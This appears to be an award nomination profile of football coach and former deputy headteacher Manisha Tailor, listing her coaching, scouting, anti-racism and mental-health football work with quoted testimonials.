Manisha Tailor: As a class teacher, Manisha pioneered the first football club in a Hindu faith school. This began with a boy’s lunch time and after school club reaching 25 children once a week. To gain interest from the girl’s and also change the mind-set of girls and parents on how football is perceived, Manisha began to use her lunch-hour to play outside with the children. By actively being involved as a female teacher, this had tremendous impact on the girl’s and consequently she was able to run a girl’s football club too with 20 attending each week. Both girls and boys were now participating in a game that was previously perceived as not being for ‘Asian’s’, and certainly not one that females would take part in. She then used the power of football to create better relationships between the preparatory and senior schools (as this was a private school).
Manisha organised several friendly matches where the 6th form students played against the teachers, which was a team made up of staff from both the prep and senior school. This had a positive impact on community cohesion and strengthened communication between the staff in both schools.
• 2006 – 2010 (Brent – paid): As head of science Manisha led the whole school (consisting of 720 pupils) in attaining a ‘Gold’ mark accreditation.
As head of science Manisha led the whole school (consisting of 720 pupils) in attaining a ‘Gold’ mark accreditation making progress from un-satisfactory to outstanding from Foundation phase to Key Stage 1 to Key Stage 2. This had a particular focus on mental well-being and leading a healthy lifestyle. She was asked to help other schools within the borough also attain their accreditation.
• 2005 – 2010 (Brent – voluntary): Manisha worked as a class teacher in a state school within Brent and set up the first mixed football club and team for both girls and boys.
Manisha worked as a class teacher in a state school within Brent and set up the first mixed football club and team for both girls and boys. In 2006 the mixed gender school team became Brent Cup finalists. Each week 30 children of different ethnic backgrounds would attend the sessions.
In 2010 Manisha was asked by The Football Association (The FA), to participate in their national poster campaign (‘Football Needs You’) to help increase the number of volunteer coaches at grassroots level in the UK. As a result, many BAME girls and parents saw the campaign and wanted Manisha to start a girl’s only club. She felt being actively involved with the community to promote the sport was imperative to gain interest from the girls as well as their parents – leading by example to break down stereotypes and barriers was key and led to engagement and regular participation from BAME groups.
• 2006 – 2007 (Brent – voluntary): Partnership working, setting up an education project with Rachel Yankey OBE.
Manisha worked closely with Rachel Yankey, England and Arsenal Ladies star, to launch a football education project at her school which specially targeted the ‘hard to reach’ and ‘vulnerable’ groups of children within key stage 2. Manisha was the strategic lead and the pupils who took part (60 pupils across 2 groups) made 2 sub levels progress in literacy as a result.
• 2008 – 2010 (Brent – paid): Strategic leadership and impact on whole school curriculum as deputy head teacher.
When Manisha was appointed as a Deputy Headteacher and with her role as head of assessment and curriculum, she aided the school in progressing from a ‘satisfactory’ to ‘good’ with outstanding features. Manisha’s lesson was observed and graded by Ofsted as being ‘outstanding’ and was used as an exemplar to the rest of the school and merited in the school’s Ofsted report. This school consisted of 720 pupil’s and approximately 54 staff members.
• 2009 – 2013 (Brent – voluntary): Manisha volunteered at Gibbons Wreckers Youth Football Club, a Community club based in Harlesden, for 2 hours a week reaching 200 young people aged 5-16.
Manisha has spent time volunteering at Gibbons Wreckers Youth Football Club, a Community club based in Harlesden, for 2 hours a week reaching 200 young people aged 5-16. This was a particularly challenging area and there was a real need for this club in providing local children a safe and inclusive environment to positively engage in sport. She was head coach and manager for the Under 7 team, however became involved in other aspects of the club such as: creating a coaching handbook; creating a club video for their open day for parents, and organisation of resources as well as writing risk assessments for external visits and leading on the taught coaching programme/curriculum. Her role also included to liaise with the schools in which the players in the club belonged to – working jointly to impact and nurture the holistic development of each player (social, psychological, technical, physical and educational).
The impact of Manisha’s work helped to sustain the club, especially the foundation phase (5-11 year olds) which saw 60 local children from that age band attend each week. “From the time Manisha began working at our football club she has remained professional and thorough throughout. She is extremely knowledgeable within the game, but brings a different unique element to her coaching approach with her education background and expertise. All at the club recognise her patience, tolerance and genuine passion and love for not only the game, but for all her young players.
The work she is doing in our community club, at grass roots, as well as our local community in engaging hard to reach families and children into being active, is phenomenal. Breaking barriers and stereotypes and going against the norm. She is an absolute credit to our football club and the whole football family.” (Andy Clifford, Gibbons Wreckers YFC, club secretary).
• January 2011– August 2011(Hillingdon – paid): Impact of strategic leadership as interim deputy headteacher and trainee headteacher at a Church of England School.
Manisha was appointed as an interim Deputy Headteacher, whilst a Headteacher trainee, to help lift the school out of special measures. This was a Church of England School in a disadvantaged area with a high proportion of children on the special needs register. As a young Indian female this posed many challenges from staff and parents and Manisha faced work-place bullying which led to the involvement of the National Union for Teachers.
At that time, with 10 years of experience in education, it was the first time she had experienced bullying in the workplace to the extent that she was made to feel alone, isolated and cried many times. In overcoming this experience, with much courage and resilience, her strategic direction led the school attaining high pass rates in SATs and receiving a ‘good’ for progress from HMI inspection. She gained the trust of pupils and parents and for the first time at the school initiated a charity staff and Year 6 football match. The whole school (540 pupils) attended along with their parents. With her presence and determination, attitudes towards her skin colour, race and religion changed for the better.
• 2011-2014 (mixture of paid/voluntary): Coaching with The Rachel Yankey Football Programme.
Manisha’s initial coaching role began with The Rachel Yankey Football Programme. Given her teaching experience, Manisha became lead coach working in several multi-ethnic primary schools across the borough of Brent reaching somewhat 320 children (boys and girls) a week. This had much impact on BAME girls who became more interested in wanting to play football. Her expertise and commitment was recognised by Arsenal and England’s Rachel Yankey, who gave Manisha the opportunity to lead on an education and social inclusion project. This targeted 30 pupils in Year 2 who were dis-engaged in learning.
The impact was engaging the disengaged pupils into mainstream education and learning, including students from pupil referral units and severe social/psychological/behavioural problems. Manisha voluntarily designed a football coaching curriculum for 5-11 year olds which includes long and short term plans, which is still used by Rachel’s Football Programme to date. This coaching curriculum strengthened links with local schools within Brent and provided Rachel and the schools with evidence as a service provider, holding them to account for delivery.
The assessment for learning criteria Manisha created ensured pupil progress was monitored placing high emphasis on physical education. This was positively received by all the schools she worked with. “It is a pleasure to work with Manisha and see her grow in confidence while working within the football coaching environment. Her coaching style and ethos of allowing children to be taught through guiding them to make their own decisions, and learn through making choices, whether right or wrong, has helped to build more confident players who are able to use initiative and able to think for themselves” (Rachel Yankey – Arsenal Ladies/England International/Team GB).
• 2011-2012 (voluntary): Coach at Indian Gymkhana men’s 1st team.
Manisha took herself out of her comfort zone and wanted to challenge the perceptions and stereotypes surrounding Asian females in coaching football. As a volunteer she began coaching Indian Gymkhana which is an Asian community men’s team based in West London who play in the Middlesex County Regional League (Premier Division). She volunteered for 1.5 hours a week including attending match days and had a real impact on how Asian women are perceived in the men’s game. It was a struggle initially given the attitudes of some of the players, however her confidence and resilience towards adversity demonstrated that she was then viewed as a professional within their own right – having knowledge and skills within the game, equal to that of male counterparts.
“The players and management team at our club have seen the significant improvement Manisha has made to each player within training sessions. She is a visionary thinker – skies always the limit! She is able to demonstrate high quality differentiated planning to suit the needs of all our players, but is also flexible enough to make adjustments when required. She is highly respected by all members of our club and community. During her time with the men’s first team she has shown a variety of coaching/teaching methods and intelligence as a coach. She is an absolute pleasure to know and work with. The amount of time she spends volunteering during her busy schedule is commendable, as well as the confidence she is displaying in breaking down barriers as an Asian female football coach.” (Indian Gymkhana, Sunil Sharma, 1st team manager).
• 2012 – present (voluntary): Manisha works as an academy scout at Brentford Football Club and is currently the only Indian female to hold such a position within a professional club.
Manisha works as an academy scout at Brentford Football Club and is currently the only Indian female to hold such a position within a professional club. She was head-hunted for this position where she focuses on the Foundation phase (5-12 year olds) following a blog that she wrote based on teaching and coaching and transferable skill-set. Miguel Rios, academy manager at the time, invited Manisha to the club to have a discussion about a scouting role which she then pursued. Through her role she has been able to signpost several Black, Asian and Minority Ethnic players to trial and has demonstrated that hard work and commitment can lead to a woman working with men’s football clubs. She is an inspiration to both men and women alike.
“Manisha is an inspiration to both men and women alike, of all ages and ethnic backgrounds. She had continued to succeed in all aspects of her work within the professional games, despite adversity and circumstance. Breaking and fighting through many barriers, both personal and external – her resilience, determination and mental strength needs to be recognised. An inspirational individual and credit to the game of football.” (Bobbie Chahal, Sky’s Soccer AM, Assistant Producer).
• 2013 – 2014 (mixture of paid/voluntary): Manisha founded an educational programme titled ‘Elite Athlete Experience’ for The Rachel Yankey Football Programme.
Manisha founded an educational programme titled ‘Elite Athlete Experience’ for The Rachel Yankey Football Programme. This project that is curriculum specific and focused on holistic player development. The launch of the project appeared on BBC with Jessica Creighton and saw Manisha work in a range of schools across the UK which gained national coverage but also had a reach of just over 1500 young people (boys and girls) over the year. Manisha volunteered her time in creating the resources and plans required to deliver the initiative which is a testament to her dedication and commitment to wanting to do well and have impact.
• 2013 – 2014 (mixture of paid/voluntary): Partnership working with Fair Share Brent to engage 1200 young people in football.
Manisha has worked in partnership with the Fair Share Brent Trust, in conjunction with one of her youth football clubs, Gibbons Wreckers, to run a holiday programme for young people within the local area. The aim of the programme was to provide a safe environment and an opportunity to be active and develop lifelong skills they can transfer into everyday lives. It was specific to those from disadvantaged and hard to reach families – providing equality in opportunity, impacting lives for a better future. This project reached approximately 1200 boys and girls (aged 5-14) over a 6 week period having a positive impact on the community.
• 2013 – present (mixture of paid/voluntary): Centre Manager at Middlesex Girl’s Centre of Excellence & Head Coach.
To further develop as a coach with the vision of one day working within an elite football environment with female footballers, Manisha began volunteering her time at Middlesex County FA assisting at coaching festivals during the Women Super League games. Her commitment to learning was recognised where she then was appointed as a coach for Middlesex Player Development Centre working with girls aged 7 – 14 years old. These player development sessions for girls had a focus on retention and engagement and as a result of running and managing of these sessions there was an increase in the number of girls playing football, particularly those from BAME backgrounds every week. This project in particular saw 20 girls attend each week during term-time.
“Manisha Tailor is a hardworking, passionate and dedicated coach who has worked hard to become established in a number of settings including both youth and adult football. Manisha is always striving to succeed at the highest levels in the game and is a fantastic role model for Asian women in her community with a real life case study that if you are willing to challenge yourself you can succeed”. (Ciara Allan, former Middlesex County FA – Women and Girls Female Development Officer).
Continuing with her time at Middlesex, Manisha was appointed as Head coach at their Centre of Excellence in 2013 where she continues to coach and manage the U9 group. As an Asian female she has had tremendous impact on encouraging more Asian girls to engage in football, but an an elite level. Since her appointment she has been able to attract several Asian girls, one of which she worked with last season and secured a place in their U11’s team, another she worked with last season now plays at QPR girls U11’s and continues to work with Manisha for additional development sessions, and a young Asian 7 year old who Manisha works with within her U9 squad.
“Manisha has been coaching our daughter who is 9 now for over a year at the Middlesex Centre of Excellence. During this time we have seen our daughter go from strength to strength, not only with her football but her confidence too. We put this down to Manisha’s methodical approach to coaching and how she can quickly get the best out of the group and also on an individual basis, which is rare these days. Overall we feel she is getting the best advice and coaching under Manisha and we are extremely satisfied with the result and progress my daughter has made in this short period”. (Indie Bath, parent).
In 2014 Manisha was appointed as Centre Manager of Middlesex Centre of Excellence truly showing that stereotypes of women, BAME women, should be and can be challenged. Even within the female set-up, she has faced many derogatory comments regarding her gender, however facing this adversity and being in a senior role within football illustrates a woman who is breaking reaching the ‘glass ceiling’. As centre manager she has implemented policies and procedures in relation to safeguarding as well as a robust system to ensure the completion of match day team sheets for the centre and England scouts. She has led parent workshops on behaviour and code of conduct at training and match days and has developed fantastic relations with all stakeholders. As a result the players of each age group have devised a code of conduct which they have all signed and agreed to develop a sense of ownership and responsibility for their behaviours and actions. She is currently the only Indian female to hold the position of centre of excellence manager which is in the Elite professional football club pyramid.
Within this role she is able to use her work to help and inspires others to also achieve success. “In my role as technical Director of Middlesex Girls Centre of Excellence, it is important to have someone who works alongside you who is efficient, trustworthy and flexible. Manisha has shown all these qualities and more. She is enthusiastic, hard-working and knowledgeable. Her work ethic is second to none and she is always willing to listen to an alternative point of view. She also has the ability to just do what needs to be done; the only problem with Manisha is getting her to slow down as she is a ball of energy and enthusiasm. I could write pages about this young lady but I will just say she is a pleasure to work with and I hope we work together for many more years.” (Peter Augustine, Technical Director – Middlesex Girl’s Centre of Excellence).
• 2013 – present (voluntary): Manisha was appointed onto the Inclusion Advisory Group (IAG) at London FA which is a stand-alone committee.
Manisha was appointed onto the Inclusion Advisory Group (IAG) at London FA which is a stand-alone committee. As part of her role she is the media lead and assists with the profiling of the work of the County’s IAG in addition to inputting in the County Inclusion action plan which determines the work carried out in the county in relation to areas of equality. She is often asked to lead on matters in relation to women and girls football, Black, Asian and Minority Ethnic groups inclusion and Disability with her experience as a carer.
She is highly credible within the county and this has been recognised nationally by others such that Hampshire FA (on October 27th 2015) asked her to present on the work that she does in football through her organisation, Swaggarlicious, and how she can input into Hampshire FA’s inclusion policy and practice. “Manisha Tailor is an integral member of the London Football Association Inclusion Advisory Group. The work that she does in the community is commendable – she is an ambassador for women in sport”. (Darren Smith, Football Development Officer at The London FA – Inclusion).
• 2013 – present (mixture of paid/voluntary): Education worker, Teacher Trainer & Football coach – Show Racism the Red Card.
Manisha was approached to work as a football coach and education worker for National anti-racism charity, Show Racism the Red Card where she delivers equality and diversity workshops to young people nationally, in addition to adults leading on teacher training. The charity have recognised her skill-set as a former teacher and believe her to be a role model for girls and the Asian community.
“The session Manisha led with the girls generated extremely thought provoking discussion. The students were engaged and fully involved in topics relating to racism and sexism. It was great to be a part of it!” (Mrs Woollatt, Year 9 class teacher, Bishops Hatfield Girls School – Hatfield). Another school stated: “The definition of ‘racism’ was made very clear to the children and that it is made up of different forms. Manisha encouraged the children to work together in unfamiliar groups. It was fantastic! Great to hear the ideas from the young people flowing and to see the way they took to the subject in a positive way.” (Teachers from Westfield Primary School, Woking).
More recently in 2015 she has been asked to deliver diversity training to the Met Police within Kent and Essex using her personal story within football to discuss issues around recruitment, retention and job perceptions within the police force. Someone from the Met had heard Manisha speak at a conference and were inspired by her story that they approached Show Racism the Red Card about her work and potential delivery to the police force. Her key focus was on how the Met Police can create an inclusive workforce translating ideas from the football environment. “I can’t say enough about the excellent work that Manisha has done and achieved in promoting women’s football and coaching. Manisha is inspiring to all with her bubbly personality a great role model to so many young people looking to pursue a career in football. Manisha was invited as a guest speaker at our diversity conference for Kent Police, the audience found her to be very interactive and engaging throughout her presentation. This allowed healthy discussion around the topic matter of perceptions”. (Suki Randhawa Kent Police, Diversity Training Team).
Steve Goodsell, Regional Manager for Show Racism the Red Card talks speaks very highly of Manisha and her work: “Strong, positive female role models play an important part in helping to encourage girls and women to aspire to be the best they can be, as players, coaches or administrators and managers and having Manisha as one of our education workers is important on imparting that message. She is a credit to our organisation and has been able to reach and touch the lives of many across the UK.” (Steve Goodsell, Show Racism the Red Card – South East Regional Manager).
Manisha was also appointed by Kick it Out and the Premier League to deliver football equality workshops to all Premier League clubs and has attended awareness weekends at the Premier League Academies. She is currently the only Asian female to hold such as position in the UK. Kick it Out’s Education Manager, Troy Townsend talks of her dedication to the game of football: “Manisha is a wonderfully dedicated individual who has a tremendous passion and desire to achieve in football. She will continue to progress and I have no doubt she will achieve all of her ambitions. Being featured on sky sports on numerous occasions, this is national exposure for a beautifully eloquent person who understands football. And that is not easy. As I have said before, skies the limit”. (Troy Townsend, Leadership and Mentoring Manager – Kick it Out).
• 2014 – present (Paid): Education tutor for The Football Association (The FA)
Manisha successfully completed the FA ‘Developing the Developers’ course and due to her teaching knowledge, skills and experience, was accepted to deliver the FA Education modules – Junior Football Leaders and Leadership Through Football to young people aged between 12-19 year, across the UK. The delivery of this course is determined by college/organisation funding and given the financial strains within educational establishments, Manisha tirelessly worked to secure funding of £1000 from London Youth and United Learning in 2014, where 60 students attained the Junior Football Leaders award with no cost to them or the school. Manisha is a powerful role model for girls and women in football and helped to target girls participation. “United Learning is a national group of state academies and independent schools.
The PE/sport network have targeted engaging girls in sport as one of our key priorities for this academic year, so we are glad to be able to partner with Manisha and her company, Swaggarlicious Ltd, on this particular programme. Whether as participants, leaders, coaches or officials, we want girls to feel empowered and confident to make sport a part of their lives. We know that active young people achieve better at school and make significant contributions to their communities, so this investment in sport is central to our core ambition to bring about ‘the best in everyone’ and having someone like Manisha involved to inspire the young girls is brilliant”. (Shaun Dowling, Head of Sport – United Learning). Manisha is also currently the only Indian female to hold a position with The FA as an Education Tutor.
• 2014 – present (mixture of voluntary/paid): Manisha was asked by The FA to become a ‘supplier’ for the work that they do in engaging with the BAME community in football and is seen as a role model for women in football.
Manisha was asked by The FA to become a ‘supplier’ for the work that they do in engaging with the BAME community in football and is seen as a role model for women in football. “Manisha is a top role model for women in football” via twitter (Shelley Alexander, BBC editorial lead on Women’s Sport). This not only enables her to use herself as a role model to inspires others, but means that she provides work opportunities to others through her company. “From the day I met Manisha her constant support and guidance has really helped me to step into the football industry. She has guided me into doing the right things, things that would really benefit me. She has given me direction on where to go with my career and in life.
The work experience Manisha has given me so far has helped me to see the work that she does – she is a great mentor and role model for the community.” (Dilan Mistry, Tottenham Hotspurs Development footballer). She is recognised and valued by many: “I did my Level 1 coaching course with the London FA and there were at least 4 or 5 people who said they were thinking about it and then met you or heard you speak and decided to do the course – it was really nice to hear your name mentioned. Manisha, you really are motivating and inspiring girls and women to coach.” (Jen Lumby, Level 1 coach).
• 2014 – 2015 (voluntary – 4 hours a week): Football coach at Hampton and Richmond FC.
As well as to further develop her football knowledge and coaching skills, Manisha wanted to ‘throw herself in the deep end’ and challenge the stereotype of women in male dominated industries by working with the U19 academy boys at Hampton and Richmond Borough Football Club. In the first instance the boys thought Manisha was their physio and it took much time, patience and effort to earn respect and credibility as a football coach. This was certainly a test of resilience and Manisha triumphed against sexism to promote gender equality within the beautiful game. Manisha is seen as an inspiration: “Manisha is an inspiration not just to women, but all that aspire to overcome adversity and achieve great things in football.” (Baljit Rihal, Director at Inventive Sports & Founder of Asian Football Awards).
• January 2014 – present (paid): Football coach and supplier for a girl’s project at St Gregory’s College.
With her passion for driving forward female participation in football, Manisha helped St Gregory’s College, based in North West London, to gain funding, which in turn gave Swaggarlicious a contract to deliver football sessions to girls aged 12 – 14 years old, on a weekly basis. Given the demographics and ethnic make-up of those living within the area the group of girls was diverse made up of those from the Black, Asian and Minority Ethnic communities. Liz Lowden, PE leader at the college speaks of the impact Manisha has had with the project: “Girls football has really taken off at St Gregory’s and having a qualified female coach coming in to school to deliver some of the training sessions has had a huge impact on the standard.
This year we entered a girls’ team in the Middlesex Cup for the first time! Manisha has been key in delivering high quality coaching as well as consistency and she has developed a good rapport with the girls. Obtaining more funding from Brent sports development to continue this project is vital in maintaining participation and quality. We expect to become more competitive at both a local and county level as well as encouraging our girls to have fun whilst promoting healthy, active living”. This project has seen 30 girls take part in structured football once a week.
• 2014 – present (paid): In partnership with The Football Association (The FA), Manisha has set up a football Community Development Centre at The Swaminarayan School in Neasden, North West London.
In partnership with The Football Association (The FA), Manisha has set up a football Community Development Centre at The Swaminarayan School in Neasden, North West London which runs on a weekly basis. Manisha was asked by The FA to help them deliver specific targets from the Anti-Discrimination plan that feed directly into looking at Asian participation. The centre provides opportunities for those from the Asian community to play structured football with sessions delivered by qualified FA coaches.
Through this project Manisha has employed coaches from BAME backgrounds to deliver sessions in which she acts as their mentor. This is fantastic in capacity building and providing work opportunities to targeted community groups. The school have spoken very highly of this partnership: “The Swaminarayan Prep School is delighted to work with Manisha Tailor from Swaggarlicious and The FA on the launch of the Community Development Centre. During the assembly that she delivered I believed that the children became instilled with a sense of awe and wonder in regards to football. Schemes such as this and more will increase participation as well as igniting the spark of lifelong learning within sport”. (Mr Matthew Alan Thomas, Physical Education Co-ordinator).
• 2014 – present (mixture of paid/voluntary): Founded Swaggarlicious Ltd
Manisha became company director of Swaggarlicious Ltd which is focused on challenging stereotypes within the game. Her key targets are: women and girls participation; inclusion of Black, Asian and monitory ethnic groups; young people and employability and Mental Health. Most of Manisha’s is sub-contracted through ‘Swaggarlicious’ and further details on her story can be found through her website: www.swaggarlicious.com. Having to deal with her twin’s kidnapping and constant suicide attempts, her selfless service to community is commendable and I truly believe, through Swaggarlicious, she has and will continue to change lives in the UK and globally.
Swaggarlicious is an official partner for ‘This Girl Can’ a national campaign to help increase the number of women in sport in addition to an official supporter for The Female Coaching Network (FCN) which highlights females in coaching world-wide. A coach praised Manisha after reading her blog on FCN: “I read your blog with Female Coaching Network Manisha and you should be proud of what you have achieved. You are in your arena! In a position to fail everyday to an audience and you DO IT daily with confidence and execution. Well done as it is not an easy task. Not an easy option either. Not everyone can stand up in front of groups of people and deliver a session. Superb and respect.” (Kevin Randall – Head of Academy at ‘Soccer Chance Academy’)
All of Manisha’s work is run through her brand, Swaggarlicious which has gained much popularity within the UK.
• December 2014 – April 2015 (voluntary): Producer and Presenter – Sports Tonight Live TV.
Manisha was head-hunted by Sports Tonight Live TV to commentate on the Indian Super League. Following her success she was asked by the channel, which runs on freeview and online, with viewership of 8,000 a month, to produce and present her own show. She became the first Indian female to produce and present a Futsal show in which she interviewed the England Futsal Manager, Pete Sturgess, Head Coach of England Futsal, Michael Skubala, in addition to those from the grassroots game. Her purpose with the show was to illustrate good practice from grassroots to the professional game in addition to helping raise the profile of Football in England.
• September 2015 – present (voluntary): Founder of ‘Simply Being’ – a football project helping those with mental health.
Manisha founded ‘Simply Being’ – a mental health and football project in partnership with Barnet Voice for Mental Health and Wingate and Finchley Football Club to give people with mental illness the opportunity to engage in sport within a safe inclusive environment. She is working closely with mental health service providers that bring the service users with their carers to the sessions. This project provides those with mental health hope and a sense of belonging. They are not only able to lead a healthier lifestyle, but develop social and communication skills.
The partnership with Wingate and Finchley FC means that the service users can experience watching a live football match, something that they may never experience which is truly amazing. Additionally, this gives Manisha the chance to engage her brother in football who attends with his carer. A carer who attended commented: “I think it is so important to have projects like ‘Simply Being’ for outside interaction and the wellbeing of these youths. They have the chance to engage with other members of the community, play sports and keep fit – just their general wellbeing. People should definitely fund this project as it prevents those affected by Mental Health from becoming sedentary or becoming couch potatoes. Thanks to Wingate & Finchley, they also get to watch their local side play football and it gives them something to aspire to when playing.” (Valerie, carer for Mental Health – Lifeways).
One of the service users thanked Manisha for providing something that allows him to be outdoors: “I had fun, it was cool. I’d love to do it again. I used a lot of energy and had lots of fun today. It showed me that I need to get outdoors more and play football. I really want to come to another session. It helped me get out of the house, thank you.” (Obinna, Mental Health service user – Lifeways). With Manisha’s commitment to engaging women in sport, a young woman who has attended a session said: “It was very helpful and important. It helps you with your coordination, to focus, have fun and it keeps you fit. It doesn’t make any difference whether you’re a boy or a girl, everyone is equal. You can learn from each other, hopefully we can get more people involved”. (Ellie R, Barnet Mental Health)
• September 2015 – present (paid): International football and education work.
Manisha’s expertise in education and coaching has been recognised internationally and in September 2015 she was invited to Canada, Alberta, to coach girls for a grassroots programme. This saw her coach just over 100 girls aged 10-17 year old over a 2 day period. The feedback she received was extremely positive. “Southwest United Soccer Club was pleased to have Manisha Tailor and Cosmo Soccer host our soccer camp. Our girls program makes up over sixty percent of our membership. Unfortunately, in Edmonton there are very few elite level female trainers. It was a pleasure to have Manisha, for the players, coaches and parents. Manisha was involved, engaged, and enthusiastic about coaching and took a genuine interest in the players. Her teaching and coaching skills were obvious from the beginning. Players benefited greatly from her coaching style.
The feedback over the past couple weeks since the camp has been overwhelmingly positive, we would not hesitate to have Manisha and Cosmo Soccer attend our Southwest United Camp in the future”. (Stan Wongus, Vice President, Southwest United Soccer – Canada). In November 2015 Manisha was asked by Show Racism the Red Card to travel to Cyprus to work for the Ministry of Defence at 4 different military base schools delivering equality workshops as well as football sessions. This illustrates the extent of Manisha’s impact within both fields and the trust and faith put on her in carrying out such important work. Staff and pupils in Cyprus were very positive about Manisha’s work. “Just wanted to say a big thank for all your efforts today. You led some brilliant sessions where all the children were engaged and enthusiastic. You were punctual, professional, polite and organised. The children and staff were most impressed. I can safely say that the children learnt some vital key messages about racism”. (Terry Fazackerley, senior school leader, Cyprus). Manisha will be travelling to Belgium in 2016 to deliver coaching and equality workshops, thus illustrating wider impact and reach of diverse communities.
• December 2015 (paid): Manisha launched a ‘Swaggarlicious’ clothing brand for women.
Manisha has launched a ‘Swaggarlicious’ clothing brand for women. The style of clothing is feminine lounge wear and focuses on helping women feel more confident about the way in which they look through casual wear, inspired by Manisha’s own lifestyle. The style is unique in the sense that it can be worn in the gym whilst working-out, or on an evening out with heels. Manisha understands the importance of mental well-being through her experience as a carer with her brother and will use this initiative to financially support her ‘Simply Being’ football project in addition to helping her set up borough wide support groups for carers and those with mental illness from the Black, Asian and Minority Ethnic Community. In the first instance her clothing line will be self-funded.
• January 2015 – present (voluntary): Football Charity and Community work across the UK.
Manisha and her brand ‘Swaggarlicious’ is frequently asked to support local and national football related causes. In August 2015 Manisha was invited to Mandip Mudhar’s Memorial Tournament to host coaching sessions for 5-11 year olds in the ‘football zone’ area in the duration of the adult tournament that raises awareness of stem cell donation within the Black, Asian and Minority Ethnic Communities:
Manisha is becoming known within various County FA’s and has been asked by Hampshire FA to aid with their inclusion action plan: “Manisha is one of those scarce and memorable people that infect you with their passion, professionalism and creativity all in one hit. We invited Manisha along to attend a Hampshire FA Inclusion Advisory Group, both my colleagues and I were left impressed by Manisha’s ability to interpret the needs of a local population and align to strategic priorities using creative and innovative media applications.” (Matt York, Senior Development Officer – Hampshire FA). Manisha is closely linked with charity, Street League, which uses football to engage young people back into employment. Cheryl Forde, former Progressions Co-ordinator at Street League NW London said this about Manisha: “When you meet someone who is so open and willing to help in any way, that person is Manisha Tailor. Such an inspirational person and has inspired many of our Street League graduates in wanting to succeed.”
• November 2015 – present (mixture of paid/voluntary): Partnership work with Swaminarayan Sports Academy, Kingsbury Mandir.
Manisha is a highly sought after coach within the Asian community and was invited by Swami Bapa FC, a team set-up within the Swaminarayan Mandir in Kingsbury, to lead a coaching session for 6 – 16 year olds. Manisha will now continue a working partnership with the mandir to engage Asian girls to play football in addition to being a key figure head at mandir sports events. “The students can see what is possible, and view Manisha’s example that we can actually make it into professional sport. It’s important for the community to get involved in sport as it gives them structure, drive, and focus skills that they can take into their academic careers and professions. The football session led by Manisha and her assistance Dilan has certainly had a positive influence”. (Dipesh Patel, Swami Bapa FC coach – Swaminarayan Sports Academy, Kingsbury)
“Manisha Tailor is not only a dedicated & hard working coach, but she has a fantastic understanding of how crucial it is to engage & prepare the next generation of young footballers. We at Pitch Talk feel that Manisha is a credit to the beautiful game & a credit to herself with her passion and dedication to football, along with her passion for helping nurture talent and continued striving to improve her own methods & skills” (Pitch Talk Football Show)
“Manisha is an inspiration to both men and women alike, of all ages and ethnic backgrounds. She had continued to succeed in all aspects of her work within the professional games, despite adversity and circumstance. Breaking and fighting through many barriers, both personal and external – her resilience, determination and mental strength needs to be recognised. An inspirational individual and credit to the game of football” (Bobbie Chahal, Sky’s Soccer AM, Assistant Producer)
“Manisha is a great student of the game who understands children learning and social pathways. She is able to adapt and meet the need of players through her use of age appropriate language and connecting with the players. On the Recent module 2 course Manisha showed a real concept of children’s learning and shows she can inspire both coaches and children through her approach – a real credit and asset to the game” (Kalam Mooniaruck, FA Tesco Skills Programme Team Leader for Essex, Huntingdon and Cambridgeshire, FA Coach Educator/Tutor)
“Manisha is someone who is truly passionate about her work and the development of all players she coaches (both youth and senior alike); not just in their ability to become better footballers, but also in their growth of becoming better human beings. She has the humble mentality of a student as she is always striving to learn and improve. It was an absolute joy and pleasure to teach Manisha when she did her FA Level 1 coaching badge a few years ago. I am pleased to say that I continue to be Manisha’s mentor in my capacity as a coach educator – she is a credit to the game and others have a lot to learn and gain from her. I have signposted many coaches who I educate, to go and observe her sessions as she is a true role model” (Corey Donoghue, London FA Coach Educator)
“From the time I met Manisha what was clear about her was her passion and love for the game and everything that she is doing within it. She is an extremely dedicated individual, self-motivated and driven – the sky’s the limit! She brings a whole different set of skills to the playing field – education and teaching expertise, combined with football knowledge is a recipe for success, and it is obvious that those that come into contact with her are reaping the rewards (young players, adults, future coaches/managers etc…). Manisha is highly credible within the football industry amongst top organisations such as the FA and Kick it Out, and professional players. Believe in me, credit where its due – she is fully deserving of an award to recognise her progress to date in an industry that poses many challenges. Alot more to come from this girl!” (Andy Impey, Former professional footballer – QPR / Represented England U21s)
“Manisha is an inspiration not just to women, but all that aspire to overcome adversity and achieve great things in football” (Baljit Rihal, Director at Inventive Sports / Player Agent / Founder of Asian Football Awards)
“When our foundation was in the initiation stage of set up we recognised the importance of having key role models to help, support and truly represent what we were about. Having come across one of Manisha’s articles, I was instantly in admiration of her knowledge, passion and sincerity for sport and helping people in general. Having read further articles about Manisha’s role in women’s football, her work with the FA and having spoken to her about coming on board the foundation, we felt that Manisha would perfectly represent our initiative. Through Manisha our foundation has already benefitted in terms of networking and advice, further emphasising her credibility amongst some very prominent members of the sporting arena. A kind, friendly and well respected person, we are very much looking forward to Manisha representing our foundation.” (Apinder Sahni, Director of “British Asian Sporting Talent Foundation” -BASTF)
“Manisha Tailor has been an integral member of the London Football Association Inclusion Advisory Group. The LFA IAG was set up to represent the diverse community of the capital at Board and council level. The aim is to give under represented groups a voice and a choice on how football is run in London. Manisha joined the group at an important transitional period and helped the group become a standing committee within the London FA structure. Manisha sits on the group and represent multiple groups including Women and girls, people with disabilities and Asians in football. Her experience and knowledge is valuable to the group, for setting up different programmes that are designed to increase participation for BME and under represented groups. Manisha acts as an inspirational role model to young females that want to get involved with football and sport, whether it’s, participation, coaching or an ambassadorial role. As a coach Manisha has so much to offer, and in the current climate where women in coaching roles are so low in comparison to the population, we need the likes of Manisha to change it. If anyone Manisha deserves this award for the work she does in the community and the ambassador she is for women in sport. The columns and blogs that she writes are enlightening and inspirational for all to read and the London FA are very lucky to have her representing us in the community. She has now been appointed at our media lead” (Darren Smith, Football Development Officer at The London FA – Inclusion)
“Manisha Tailor is an extremely active, influential and committed member on the Grants Board of the Women’s Sport Trust. We became aware of Manisha through her blog and her reputation as someone with a determination to make sport as inclusive as possible. We were also aware of Manisha’s ability to blend a passion for football with the leadership and coaching insights that come from her previous experience as a Deputy Headteacher. Since joining the Board she has more than lived up to the expectations we had about the value she would add to the Trust. She goes out of her way to link us to potential allies, to write about and promote the Trust, to attend events and generally to be a visible role model for women’s sport. At the Women’s Sport Trust we believe that change comes from committed individuals choosing to use their influence and Manisha embodies that idea in everything she does – we are incredibly proud that she has decided to become associated with us and highly recommend her for this award.” (Tammy Parlour & Jo Bostock, Founders of The Women’s Sport Trust)
“Manisha has an amazing story. She is truly inspirational. There are so many challenges, yet there she is!” via twitter (Ashish Joshi, Sky Sports News)
